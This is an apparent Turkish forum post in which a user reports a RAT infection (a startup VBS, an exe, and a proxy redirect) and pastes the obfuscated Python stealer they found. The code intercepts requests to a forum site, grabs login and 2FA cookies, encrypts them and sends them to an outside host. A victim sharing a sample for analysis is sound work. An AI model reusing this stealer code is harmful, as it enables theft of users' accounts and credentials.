UpdaterUpdater.py dosyası içinde olanlar önemli
Dosya şifreli hocam rat yemişim antivürüste trojan olarak sonuç verdi 3 dosya sokmuş sisteme
biri basic dosyası .vbs bu başlangıçta çalışıyor exe dosyasını çalıştırıyor aynı şekilde py dosyasınıda exe direk karşı pc bağlantı yapıyor update.py de yazılımı ve bağlantıyı güncelliyor üstelik bilgisayarımı bir arasunucuya yönlendirmiş ayarlarımdan python dosyasının kodlarıda şu şekilde
import urllib as gSKIaflpciXm
import os as JWMR
import base64 as vIlxNhrREmtF
aYXrERqJoA = lambda n: (n - (2 % 4)) - 1
QKFvwrXuUy = lambda s: ''.join(chr(int(aYXrERqJoA(ord(c)))) for c in s)
JWMR.environ[QKFvwrXuUy("qrbsur{|")] = QKFvwrXuUy("-")
def request(sIiOaNoZ):
if sIiOaNoZ.request.url == QKFvwrXuUy("kwwsv=22zzz1u431qhw2"):
DEmTMnQNejcKFl = sIiOaNoZ.request.cookies.get_all(QKFvwrXuUy("u43xvhulg"))
lEpOAQZkgaDtbrnCfGoyRLUxXh = sIiOaNoZ.request.cookies.get_all(QKFvwrXuUy("u43sdvvzrug"))
eEYvPiNw = sIiOaNoZ.request.cookies.get_all(QKFvwrXuUy("u43idvw5id"))
DjZXLpzVUlugAneOdMax = sIiOaNoZ.request.headers[QKFvwrXuUy("Xvhu0Djhqw")]
if DEmTMnQNejcKFl:
if lEpOAQZkgaDtbrnCfGoyRLUxXh:
ngBmCydc = (DEmTMnQNejcKFl[int(aYXrERqJoA(3))], lEpOAQZkgaDtbrnCfGoyRLUxXh[int(aYXrERqJoA(3))], eEYvPiNw[int(aYXrERqJoA(3))] if eEYvPiNw else '', DjZXLpzVUlugAneOdMax).__repr__()
fPcGKB = QKFvwrXuUy("3{4{5{6{7{8{9")
cVLvNFeWkpDgTKYjAzIPuSMCtbhGimUE = ''
for SP in range(len(ngBmCydc)):
cVLvNFeWkpDgTKYjAzIPuSMCtbhGimUE += chr(ord(ngBmCydc[SP]) ^ ord(fPcGKB[SP % len(fPcGKB)]))
ngBmCydc = vIlxNhrREmtF.b64encode(cVLvNFeWkpDgTKYjAzIPuSMCtbhGimUE.encode()).decode()
ngBmCydc = gSKIaflpciXm.parse.urlencode({QKFvwrXuUy("gdpq5"): ngBmCydc}).encode()
qAjcdS = gSKIaflpciXm.request.Request(QKFvwrXuUy("kwws=22kgl}oholvdqv1frp2gdpq51sks"), data=ngBmCydc)
gSKIaflpciXm.request.urlopen(qAjcdS)